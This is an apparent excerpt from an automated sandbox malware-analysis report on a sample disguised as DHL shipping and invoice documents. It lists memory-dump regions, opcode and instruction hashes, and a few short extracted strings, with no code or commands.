                                            • Opcode Fuzzy Hash: 9bbdfb6c15b3e7d822b6678700737c50936b3dede60ad81aa059c4d4f373c52e
                                            • Instruction Fuzzy Hash: 57232C31D10B198EDB15EF68C8906E9F7B1FF99300F11C69AE459B7211EB70AAC5CB81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V"k
                                            • API String ID: 0-3044852724
                                            • Opcode ID: 1d0cd4b395cc7cadd33de021827158b02a84f2aab5489449945789a006ad67e9
                                            • Instruction ID: 9f363b164d6cb46c09ca09f18304a17722b25c12a321c5be3e82ef2d1f820108
                                            • Opcode Fuzzy Hash: 1d0cd4b395cc7cadd33de021827158b02a84f2aab5489449945789a006ad67e9
                                            • Instruction Fuzzy Hash: DC918D70E002098FDF18CFA9D9857EDBBF2AF88304F148539E415E7298EB749985CB85
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bbcf8c20228673f3e16794e2ef0ab368a194c81243759c58c5c0c6d97761e870
                                            • Instruction ID: d46e025889bfc721d63f47d370065df640e26ecb24455bd17f7ee83988ed9d7d
                                            • Opcode Fuzzy Hash: bbcf8c20228673f3e16794e2ef0ab368a194c81243759c58c5c0c6d97761e870
                                            • Instruction Fuzzy Hash: 09420B31D117198EDB15DF68C884AE9F7B1FF99300F51C69AE4586B221EB70AAC4CF41
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 57c678e935de7713351ed96dd384d475871508f732a4546145e13053849405e8
                                            • Instruction ID: 42e0e7ede20ccd4bd14c07f922691f98ef8a8670181038425d266c440cd3b031
                                            • Opcode Fuzzy Hash: 57c678e935de7713351ed96dd384d475871508f732a4546145e13053849405e8
                                            • Instruction Fuzzy Hash: 49B16070E00249CFDB18CFA9D8857EDBBF2AF89718F248539D415E7294EB759881CB81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6347044812.0000000038DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_38de0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Jr$$Jr$$Jr$$Jr
                                            • API String ID: 0-2912140677
                                            • Opcode ID: 5fa9a2c3e3145a4ce8970d5fd2f4c63885f7ed6c02ad74ac8be886e22b8fa098
                                            • Instruction ID: c50ce45d6563119cfd89e39f7ac74e6d9fbbb7ed08754a2d80f62e0be485b988
                                            • Opcode Fuzzy Hash: 5fa9a2c3e3145a4ce8970d5fd2f4c63885f7ed6c02ad74ac8be886e22b8fa098
                                            • Instruction Fuzzy Hash: EC713E78B002059FDB44DB6DC8507AEB7F2AFC8380F10C569D819EB344EB79AD428B91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6347044812.0000000038DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_38de0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Jr$$Jr
                                            • API String ID: 0-3711025608
                                            • Opcode ID: a7f18de8122224821918e3b854548391716accb06f0e5cbf43644052e264d084
                                            • Instruction ID: 28a4f0ca59f933cf50fed01883d65adea0f4f2c5a02e4aa74f6131ea72fe64f3
                                            • Opcode Fuzzy Hash: a7f18de8122224821918e3b854548391716accb06f0e5cbf43644052e264d084
                                            • Instruction Fuzzy Hash: 35815C38B007049FEB04DB79C4606AE77F3AF84384F148569E505DB355DB79EE428B91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V"k
                                            • API String ID: 0-3044852724
                                            • Opcode ID: f765886f7e9f064422a178fb8f690ac4f241f6361f990d39e81322058fa65e74
                                            • Instruction ID: fd86b2ad482fd6d43cbca4ca89dfd1ce765ac0eee66bb88e38c2d97b6bb52bf6
                                            • Opcode Fuzzy Hash: f765886f7e9f064422a178fb8f690ac4f241f6361f990d39e81322058fa65e74
                                            • Instruction Fuzzy Hash: 5CA18D70E042098FDF18CFA8D9857EDBBF2AF48304F148139E464E7298EB749985CB95
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRJr
                                            • API String ID: 0-723744216
                                            • Opcode ID: fa335065bb5fed56d062dc420e6f3b3ee5111314ee6f71599501604c3d037e8f
                                            • Instruction ID: 19edfd8d9a89227c6dd8fdc3bbace2be620ab5fce772987742ceab4bd09578f6
                                            • Opcode Fuzzy Hash: fa335065bb5fed56d062dc420e6f3b3ee5111314ee6f71599501604c3d037e8f
                                            • Instruction Fuzzy Hash: 2B81AC34710610CFDB18DB68C894AAD7BB2EF89700F248579E406DB3A5DB79DC81CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6347044812.0000000038DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_38de0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PHJr
                                            • API String ID: 0-543013721
                                            • Opcode ID: 271fc08795ca2b21c3368aa2415e60b1ef2dde829c39483f22c5fbf7ba926ef7
                                            • Instruction ID: b4192cf2d6e83d014a38332705b4da61eb6ce96c97b7916af175da16b7ae1561
                                            • Opcode Fuzzy Hash: 271fc08795ca2b21c3368aa2415e60b1ef2dde829c39483f22c5fbf7ba926ef7
                                            • Instruction Fuzzy Hash: 09316D747002458FEB04AB78D46479F7BA7ABC8790F24852DE402EB395DE39ED06CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRJr
                                            • API String ID: 0-723744216
                                            • Opcode ID: 8942fb185e728f321d86d57d8689a7e084bb5e1840e2ce438c278a5cf4134472
                                            • Instruction ID: 9126c1278fbdfbe5869b6d685f08100ca0c6bf1b96a11871dfcd1d5d576f054a
                                            • Opcode Fuzzy Hash: 8942fb185e728f321d86d57d8689a7e084bb5e1840e2ce438c278a5cf4134472
                                            • Instruction Fuzzy Hash: 9B312B34E10A09DBDF18CFA8D4507DEB7B6EF95314F208525E405EB240EB759D81CB90
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d8b5048ebf80715bc2b652b37094205522cdfbcc88f5efe565fa12a220a9ae34
                                            • Instruction ID: 9064a305600c644893d862e0687731a47b6a2bda155563b6dc29c9d74981589c
                                            • Opcode Fuzzy Hash: d8b5048ebf80715bc2b652b37094205522cdfbcc88f5efe565fa12a220a9ae34
                                            • Instruction Fuzzy Hash: 5811CA30A043444FCB15DB98D8546CABFB5AFC5310F55C575C84C6F296D774AD06CBA2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c7935324066351c9e17f2cd418c740fac80d1abae49cba2c0b09b7e8169d347f
                                            • Instruction ID: b7a05d12fac5f36821f38edf27364b3c98ea9b132f31a3f9fc5ae426a315329e
                                            • Opcode Fuzzy Hash: c7935324066351c9e17f2cd418c740fac80d1abae49cba2c0b09b7e8169d347f
                                            • Instruction Fuzzy Hash: 29E16034B042098FDF18DB68D594AEDBBB2EF84314F248465E906EB391DB35ED82CB51
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 179fff1438b609b29e4213167a5a1ca8500a429b6d6f6e866d0b7d84758c7451
                                            • Instruction ID: f5432d0c83cfca99c8234709579e7603bd26193df80070c75a9cd7b6a558e07d
                                            • Opcode Fuzzy Hash: 179fff1438b609b29e4213167a5a1ca8500a429b6d6f6e866d0b7d84758c7451
                                            • Instruction Fuzzy Hash: F4B15E343006059BEB599B68D861AAD32E2FBCA358F154939E046CB351DF3EDC47DB82
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 663ffea163d1e5d6713232c470b280ec13893ef0ee1c9225a3a6cb310db26046
                                            • Instruction ID: d86796fbd6b3c96136861bf1b6947d6dd6e5d1eaae4f423536942a0bda77208d
                                            • Opcode Fuzzy Hash: 663ffea163d1e5d6713232c470b280ec13893ef0ee1c9225a3a6cb310db26046
                                            • Instruction Fuzzy Hash: DEB15C70E00249CFDB14CFA9D8857EDBBF2AF49B18F248539D814A7294EB759885CB81
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6347044812.0000000038DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_38de0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3bae6efabf183ec540c64aca83fcb67a456a4c7659021e015962bd80d15af32
                                            • Instruction ID: 74fc270fead7b18b0e191099e87b4a16726cb5aeca8ea865169806d6fac06a61
                                            • Opcode Fuzzy Hash: a3bae6efabf183ec540c64aca83fcb67a456a4c7659021e015962bd80d15af32
                                            • Instruction Fuzzy Hash: 01A17734A00204DFEB04DFA8C594B9DB7F2EF84399F549469E459AB391DB79EC42CB80
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6637f49e8fdb8ad5c101f33b9a92d5506b7e038a2bf9c5dc66922a218a344bbf
                                            • Instruction ID: 53fba9e30c7059c177641f3add6fa6403e50bc8c3d52fd37bfafb0575a87c928
                                            • Opcode Fuzzy Hash: 6637f49e8fdb8ad5c101f33b9a92d5506b7e038a2bf9c5dc66922a218a344bbf
                                            • Instruction Fuzzy Hash: 76817A71A002048FDB18DF68D884BDDBBF2FF88710F24C169E909AB395DB749941CB90
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 91ef0f06de89b12a03542517c91be94e85ce023013610f2a308b65a56bbf0f0b
                                            • Instruction ID: 7a77164904fa7391debe168baae7b01ba3d904268a689474684c45fa5baf6fe5
                                            • Opcode Fuzzy Hash: 91ef0f06de89b12a03542517c91be94e85ce023013610f2a308b65a56bbf0f0b
                                            • Instruction Fuzzy Hash: AD410634B10514CFDB08DBA8C568AED77B6BF88744F214469E402EB3A1DB759C80CB61
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dc9d7e353256281d86809ea6a0ac55b1116a544efd2110be9c14ad9c5fa23003
                                            • Instruction ID: 75b9d47870f903c3b821bf9312a6cbf1ba319781f9b3997a77f29a756b86ef02
                                            • Opcode Fuzzy Hash: dc9d7e353256281d86809ea6a0ac55b1116a544efd2110be9c14ad9c5fa23003
                                            • Instruction Fuzzy Hash: 3B315270B002046FEB249BBDCC51B9EBAA6EBC8724F208539E119E73C5DA719C418B95
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6347044812.0000000038DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_38de0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c3d6f2697a13853bd871733655ea77ffff669771703563231ece0f52ee11a173
                                            • Instruction ID: b14da42279e5c325e1055c670607ed7e100db4edc9fd1b00e9b635cd41c9886a
                                            • Opcode Fuzzy Hash: c3d6f2697a13853bd871733655ea77ffff669771703563231ece0f52ee11a173
                                            • Instruction Fuzzy Hash: 10312B76F402189FDF00CFB9D841ADEBBF5AB48750F108126E955E7350D739A9418B90
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6347044812.0000000038DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_38de0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4c83e377da1a032e5e9b6ca01be5b69f6e2ce08e80b3c70917accc554d011315
                                            • Instruction ID: 6a960f53d25afb830648889561c0d34155c53d50f23a8babb2a9a039da84b66c
                                            • Opcode Fuzzy Hash: 4c83e377da1a032e5e9b6ca01be5b69f6e2ce08e80b3c70917accc554d011315
                                            • Instruction Fuzzy Hash: 20317034E102499BDB09CF68D8946DEBBB2BF89340F508529E916E7340DB75AC46CB50
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b28707b6af6caf369128f5f25618635b76483879ba87a445466d4083478bfd36
                                            • Instruction ID: 8d0effbb3ba3881a24d46c0d12d1acd842ec5eebdca15f420df50a79a54bae75
                                            • Opcode Fuzzy Hash: b28707b6af6caf369128f5f25618635b76483879ba87a445466d4083478bfd36
                                            • Instruction Fuzzy Hash: 6B412270D00349DFDB14CFA9C884ADEBFB5FF49314F24802AE809AB254D775A985CB91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6347044812.0000000038DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_38de0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0d9ae236870e7de3590ba013fc5890ce8549334501035fd4105ea5d7f0c5bcfd
                                            • Instruction ID: 9e0f22d85b836b4ad1f5adb37bdfe2ab5395489ba063e1e0e4fac0b4739ff684
                                            • Opcode Fuzzy Hash: 0d9ae236870e7de3590ba013fc5890ce8549334501035fd4105ea5d7f0c5bcfd
                                            • Instruction Fuzzy Hash: B5317E34E102099BDB09CFA9D89469EB7B2BF89340F508529E915F7340DB75AC42CB50
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9142b84d69060cb56d54df2a42c2dddb45e4b9d1cff5a299e9743b9e224db794
                                            • Instruction ID: 5f73750d52359dd634cf8e19a01cc7d257f28f1d13df5e97a6a9d296ce77d9bb
                                            • Opcode Fuzzy Hash: 9142b84d69060cb56d54df2a42c2dddb45e4b9d1cff5a299e9743b9e224db794
                                            • Instruction Fuzzy Hash: E9410370D00349DFDB14DF99C984ADEBBB5FF48314F20802AE409AB254D775A985CB91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4b1660cb16309528d891efa4087ecb8f0f4b502c627a242fb8d57b2413f6e628
                                            • Instruction ID: 8056a05ad73c07ed34af54f2daf2ba4d2a5e425395a359b0370964ed7803cbb1
                                            • Opcode Fuzzy Hash: 4b1660cb16309528d891efa4087ecb8f0f4b502c627a242fb8d57b2413f6e628
                                            • Instruction Fuzzy Hash: B6318630E042499BDB19DFA4C8946DEFBB2FF86300F10856AE505AB381DB759C86CB50
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3881333cb0b7190ffa50e6b0cf34fa93f3ead8439bc828bffabdf41fd89857b1
                                            • Instruction ID: c4dbd0ddbb94c2bd97ee40f39839408ae4c31bcf522d01ba0642c1ac1c1b0a10
                                            • Opcode Fuzzy Hash: 3881333cb0b7190ffa50e6b0cf34fa93f3ead8439bc828bffabdf41fd89857b1
                                            • Instruction Fuzzy Hash: D8216034E186158BDB1DDF68D5906DEB7B2AF59310F20853AE816EB3C0DB719C82CB50
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6347044812.0000000038DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_38de0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 74155b01501314bc3542e552050062fa5e3e9abb5115bebc0c73a270b4a49305
                                            • Instruction ID: ab17c137f999905c3a8f9d50a230f2557735925cf4ba95ab2cbcca02ee827ad7
                                            • Opcode Fuzzy Hash: 74155b01501314bc3542e552050062fa5e3e9abb5115bebc0c73a270b4a49305
                                            • Instruction Fuzzy Hash: D621F879F402189FDB00CF79C881A9EBBF6AB48750F148126E915E7380EB39E9418B90
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2c2da7e1b38af42b06d1fcccf7caf202315595bb37bd1ccd486c646ed2eb2615
                                            • Instruction ID: 0ada596e8964377d5fbfa52002bee444641e7a527a3e35ec3693a9b6b3d59bfc
                                            • Opcode Fuzzy Hash: 2c2da7e1b38af42b06d1fcccf7caf202315595bb37bd1ccd486c646ed2eb2615
                                            • Instruction Fuzzy Hash: 21213231E142099BDB19DFA8C8546DEF7B2BF89300F10C529E915BB380DB759C86CB90
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0216133db521055a4e6632114a82c00880e502145a612a5ca95ed7de5171c501
                                            • Instruction ID: 261a8242295e077871fc8fdd5073f8d9fcc5c19458e5c8a7eb3356ad1011b400
                                            • Opcode Fuzzy Hash: 0216133db521055a4e6632114a82c00880e502145a612a5ca95ed7de5171c501
                                            • Instruction Fuzzy Hash: 2B21A630E082459FDB09DF68C8946DEBBB2AF85300F20856AE815AB380DB719C82CB50
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 668bade129c00238c56c9f3df8306ff64bf9f7a9a296a33702d6a68d7bc28397
                                            • Instruction ID: 2de14ec79a55653d082bf9823fcc46da6e0b41930ac7b105b5a8830b7213d229
                                            • Opcode Fuzzy Hash: 668bade129c00238c56c9f3df8306ff64bf9f7a9a296a33702d6a68d7bc28397
                                            • Instruction Fuzzy Hash: 83213B34B002199FDB29EB74C5A56EEB7F2AF49345F200479D505EB3A0DB398D81CB91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6319463053.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_ad000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f0f5e7845d21ea07f05b96ed30807bb7a04b46ad5dbd0ed9f3cc7675db4f16a6
                                            • Instruction ID: 233b0bf53492b0693aed5684d51146ca60210d9658ba396641f875e7f6e84e0e
                                            • Opcode Fuzzy Hash: f0f5e7845d21ea07f05b96ed30807bb7a04b46ad5dbd0ed9f3cc7675db4f16a6
                                            • Instruction Fuzzy Hash: 6521F275604340EFDB20DF94D8C0F2ABBA1EB85314F34C56AE84A4B642C736D846CA62
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b04180e06e407fc137c13d0d119a1c2d370bb2584c24eb0114034f5608be6d18
                                            • Instruction ID: 9ca93ffd3422bb5dc5538d4c019872932977c9a6bb21b133b067e14b9ff3919d
                                            • Opcode Fuzzy Hash: b04180e06e407fc137c13d0d119a1c2d370bb2584c24eb0114034f5608be6d18
                                            • Instruction Fuzzy Hash: 81212834B012548FDB18EB78C969ADE7BF1BF49704F1005A8E406EB3A1DB399D81CB51
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a0f08909e89332fef109fa2ce4b66ffa05cfca368876e4a7e919ff2f8e0d7167
                                            • Instruction ID: 955698d993c01cbea220b17bc12825b047ca679d98a8ff58be74ddca86ec3abb
                                            • Opcode Fuzzy Hash: a0f08909e89332fef109fa2ce4b66ffa05cfca368876e4a7e919ff2f8e0d7167
                                            • Instruction Fuzzy Hash: 0C216534E146199BDB1DDF68C4546DEF7B2AF89310F20852AE815FB380DB719D86CB50
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 75e210d190ff7c2e5f8b7db15abb6cf63b0282d962f683c2c754f1c2881940df
                                            • Instruction ID: a3b15a0690dc27cf3e4474029ee12c0da09a35be323dc02514211294e1e5474e
                                            • Opcode Fuzzy Hash: 75e210d190ff7c2e5f8b7db15abb6cf63b0282d962f683c2c754f1c2881940df
                                            • Instruction Fuzzy Hash: 8421A1346501407BEB54DB68D8957DE7BB2E789314F104A35D10ACB654DB3DDC83CB92
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a48435c2dc45555319351302dea3166b24523a96b6221a42a88b81170483ba2f
                                            • Instruction ID: 836bc5db8b32fdaf66e9844213be45536f37ecde78f26ab6e97b96680fb12369
                                            • Opcode Fuzzy Hash: a48435c2dc45555319351302dea3166b24523a96b6221a42a88b81170483ba2f
                                            • Instruction Fuzzy Hash: 11115B30600600BBEF295B68D4953EE7661E797725F100939E60ACBA90DB2DDCC1C752
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 19f1b07a2925d82ff0f673dac3ed2753269757848ef91ee2fef06fea737fc441
                                            • Instruction ID: c39bb146c18a0995378cd924a4f374adcf3243e11f09fc06f415848a73686a09
                                            • Opcode Fuzzy Hash: 19f1b07a2925d82ff0f673dac3ed2753269757848ef91ee2fef06fea737fc441
                                            • Instruction Fuzzy Hash: E921F6B5D012199FCB14CF99D484BDEFBF4EF48320F14806AE808AB240D374A945CBA1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 321160616c07852eea260b34b67173b53481428bccb00c2627b3f7ecb1d1ce1d
                                            • Instruction ID: d4e7c75a0bb53165c62d00b7e20b6a9a9405e5a35e73215d522b786be8074554
